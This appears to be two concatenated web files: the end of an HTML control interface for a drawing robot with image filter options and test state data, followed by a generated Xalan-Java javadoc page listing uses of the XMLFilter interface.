name="options" id="edgeAlgoSobel" autocomplete="off" checked> Sobel </label> <label class="btn btn-secondary"> <input type="radio" name="options" id="edgeAlgoRoberts" autocomplete="off"> Roberts </label> <label class="btn btn-secondary"> <input type="radio" name="options" id="edgeAlgoPrewitt" autocomplete="off"> Prewitt </label> </div> </center> <div> <label class="lbl-sm">Kernel Size: <strong id="sliderVal_edgeKernel">0</strong></label><br> <input id="filter_edgeKernel" data-slider-id='filter_slider3' type="text" data-slider-min="3" data-slider-max="7" data-slider-step="2" data-slider-ticks="[3, 5, 7]" data-slider-value="3"> </div> <div> <label class="lbl-sm">Canny Hysteresis: <strong id="sliderVal_hysteresis1">0</strong>, <strong id="sliderVal_hysteresis2">0</strong></label><br> <input id="filter_cannyHysteresis" data-slider-id='filter_sliderHysteresis' type="text" class="span2" data-slider-min="1" data-slider-max="255" data-slider-step="1" data-slider-value="[50,100]"> </div> <div class="form-check mt-3"> <label class="form-check-label"> <input id="filter_invert" class="form-check-input" type="checkbox" value="" checked> Invert Image </label> </div> </div> </div> </div> <div class="row"> <div class="card applyCard-width pb-0"> <div class="card-body mt-1 pt-0 pb-1 ml-auto"> <button type="button" id="btn_filter_defaults" class="btn btn-sm btn-secondary mr-1">Defaults</button> <button type="button" id="btn_filter_apply" class="btn btn-sm btn-primary">Apply</button> </div> </div> </div> </div> </div> </div> </div> <div class="modal-footer"> <button type="button" id="btn_filter_close" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" id="btn_filter_save" class="btn btn-primary">Save changes</button> </div> </div> </div> </div> <div id="dimmer" class="overlay"> <div id="loader"></div> </div> <script type="text/javascript"> fillTestData(); fillStateData(); fillStateUnits(); let app = new App(); let overview = new Overview('#home-overview'); let preview = new Preview('#viewport-drawing'); let graph = new Energy_Graph(); $(function () { switch (window.location.hash.toLowerCase()) { case "#draw": $('#Draw').tab('show'); $('#nav-draw').addClass("active"); break; case "#upload": $('#Upload').tab('show'); $('#nav-upload').addClass("active"); break; case "#wifi": $('#Wifi').tab('show'); $('#nav-wifi').addClass("active"); break; case "#settings": $('#Settings').tab('show'); $('#nav-sesttings').addClass("active"); break; case "#home": case "": default: $('#Home').tab('show'); $('#nav-home').addClass("active"); break; } $('a[data-toggle=popover]').popover(); spawnNavPopovers(); fileList_GenerateHTML(); spawnFileShortcutPopovers(); spawnFreeDrawPopovers(); graph.Initialize(75, 100); for (var i = 0; i < 125; i++) graph.DrawPoint(Math.random() * 100); // --- EVENT LISTENERS --- // document.getElementById('fileInput').addEventListener("change", loadNewFile); document.getElementById("btn-anneal-start").addEventListener("click", annealStart); document.getElementById("btn-anneal-pause").addEventListener("click", annealPause); document.getElementById("btn-anneal-stop").addEventListener("click", annealStop); // #input-group-scale -> #preview_scale (text) -> #scale_group_btn -> #scale_dropdown $('#scale_group_btn').on("hidden.bs.dropdown", setImageScaleBoxInactive); document.getElementById("preview_scale").addEventListener("keyup", setImageScaleBoxActive); document.getElementById("input-group-scale").addEventListener("mouseenter", setImageScaleBoxActive); document.getElementById("scale_dropdown").addEventListener("mouseenter", setImageScaleBoxActive); document.getElementById("scale_100").addEventListener("click", function() { setImageScale(100); }); document.getElementById("scale_75").addEventListener("click", function() { setImageScale(75); }); document.getElementById("scale_50").addEventListener("click", function() { setImageScale(50); }); document.getElementById("scale_25").addEventListener("click", function() { setImageScale(25); }); document.getElementById("preview_scale").addEventListener("blur", function() { setImageScaleBoxInactive(); }); document.getElementById("input-group-scale").addEventListener("mouseleave", function() { if (!$("#preview_scale").is(':focus') && !$("#scale_dropdown").hasClass("show")) { setImageScaleBoxInactive(); } }); document.getElementById("scale_dropdown").addEventListener("mouseleave", function() { if (!$("#scale_dropdown").hasClass("show")) { setImageScaleBoxInactive(); } }); document.getElementById("preview_scale").addEventListener("keydown", function(e) { if (e.key === 'Enter') { setImageScale(parseInt(document.getElementById("preview_scale").value)); $('#preview_scale').trigger("blur"); } }); $('#nav-draw').on("shown.bs.tab", function(e) { if (draw_firstShow) { set_scroller(); scroller(); draw_firstShow = false; } }); //document.getElementById('file-container').addEventListener("scroll", function() { alert("SCROLLED"); }); setTimeout(function() { if (overview != 'undefined') overview.loadOverviewComponents(); }, 800); // DELETE BELOW (AND MAYBE ABOVE) //document.getElementById("arm_dont_need_this").addEventListener("click", function() { overview.updateOverview(0, 0, 0, 0); }); document.getElementById("arm_dont_need_this").addEventListener("click", function() { overview.test(); }); }); $(window).resize(function(){ if (!draw_firstShow) set_scroller(); }); function fillTestData() { state.robotState = 2; state.drawSpeed = 5; state.moveSpeed = 10; state.printAreaWidth = 250; state.printAreaHeight = 200; state.memCardType = 4; state.memCardLabel = "SDLabel"; state.memCardCapacity = 2048; state.memCardFreeSpace = 512; state.wifiStatus = 2; state.wifiMode = 2; state.wifiSSID = "ASUS_RFKF_5G"; state.wifiSignalStrength = 90; state.wifiSecurity = 4; state.wifiDHCP = 1; state.wifiIP = "192.168.0.100"; state.wifiNetmask = "255.255.255.0"; state.wifiGateway = "192.168.0.1"; } </script> </body> </html>
resources/Xalan/xalan-j_2.7.1-bin/docs/apidocs/org/xml/sax/class-use/XMLFilter.html
doughtnerd/POD
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Thu Nov 22 16:43:28 EST 2007 --> <TITLE> Xalan-Java 2.7.1: Uses of Interface org.xml.sax.XMLFilter </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_top"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/xml/sax/XMLFilter.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="XMLFilter.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> <CENTER> <H2> <B>Uses of Interface<br>org.xml.sax.XMLFilter</B></H2> </CENTER> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Packages that use <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#javax.xml.transform.sax"><B>javax.xml.transform.sax</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xalan.processor"><B>org.apache.xalan.processor</B></A></TD> <TD>Parses an XSLT stylesheet document (which may include and import other stylesheet documents) and produces a StylesheetRoot (a TRaX Templates object).&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xalan.transformer"><B>org.apache.xalan.transformer</B></A></TD> <TD>In charge of run-time transformations and the production of result trees.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xalan.xsltc.trax"><B>org.apache.xalan.xsltc.trax</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.xml.sax.helpers"><B>org.xml.sax.helpers</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="javax.xml.transform.sax"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A> in <A HREF="../../../../javax/xml/transform/sax/package-summary.html">javax.xml.transform.sax</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../javax/xml/transform/sax/package-summary.html">javax.xml.transform.sax</A> that return <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>SAXTransformerFactory.<A HREF="../../../../javax/xml/transform/sax/SAXTransformerFactory.html#newXMLFilter(javax.xml.transform.Source)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Source.html">Source</A>&nbsp;src)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Create an XMLFilter that uses the given Source as the transformation instructions.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>abstract &nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>SAXTransformerFactory.<A HREF="../../../../javax/xml/transform/sax/SAXTransformerFactory.html#newXMLFilter(javax.xml.transform.Templates)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Templates.html">Templates</A>&nbsp;templates)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Create an XMLFilter, based on the Templates argument..</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xalan.processor"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A> in <A HREF="../../../../org/apache/xalan/processor/package-summary.html">org.apache.xalan.processor</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/apache/xalan/processor/package-summary.html">org.apache.xalan.processor</A> that return <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>TransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/processor/TransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Source)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Source.html">Source</A>&nbsp;src)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Create an XMLFilter that uses the given source as the transformation instructions.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>TransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/processor/TransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Templates)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Templates.html">Templates</A>&nbsp;templates)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Create an XMLFilter that uses the given source as the transformation instructions.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xalan.transformer"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A> in <A HREF="../../../../org/apache/xalan/transformer/package-summary.html">org.apache.xalan.transformer</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Classes in <A HREF="../../../../org/apache/xalan/transformer/package-summary.html">org.apache.xalan.transformer</A> that implement <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/apache/xalan/transformer/TrAXFilter.html">TrAXFilter</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xalan.xsltc.trax"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A> in <A HREF="../../../../org/apache/xalan/xsltc/trax/package-summary.html">org.apache.xalan.xsltc.trax</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../org/apache/xalan/xsltc/trax/package-summary.html">org.apache.xalan.xsltc.trax</A> that return <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>SmartTransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/xsltc/trax/SmartTransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Source)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Source.html">Source</A>&nbsp;src)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Create an XMLFilter that uses the given source as the transformation instructions.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>SmartTransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/xsltc/trax/SmartTransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Templates)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Templates.html">Templates</A>&nbsp;templates)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>TransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/xsltc/trax/TransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Source)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Source.html">Source</A>&nbsp;src)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;javax.xml.transform.sax.SAXTransformerFactory implementation.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></CODE></FONT></TD> <TD><CODE><B>TransformerFactoryImpl.<A HREF="../../../../org/apache/xalan/xsltc/trax/TransformerFactoryImpl.html#newXMLFilter(javax.xml.transform.Templates)">newXMLFilter</A></B>(<A HREF="../../../../javax/xml/transform/Templates.html">Templates</A>&nbsp;templates)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;javax.xml.transform.sax.SAXTransformerFactory implementation.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.xml.sax.helpers"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A> in <A HREF="../../../../org/xml/sax/helpers/package-summary.html">org.xml.sax.helpers</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Classes in <A HREF="../../../../org/xml/sax/helpers/package-summary.html">org.xml.sax.helpers</A> that implement <A HREF="../../../../org/xml/sax/XMLFilter.html">XMLFilter</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/xml/sax/helpers/XMLFilterImpl.html">XMLFilterImpl</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Base class for deriving an XML filter.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_bottom"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/xml/sax/XMLFilter.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="XMLFilter.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> Copyright © 2006 Apache XML Project. All Rights Reserved. </BODY> </HTML>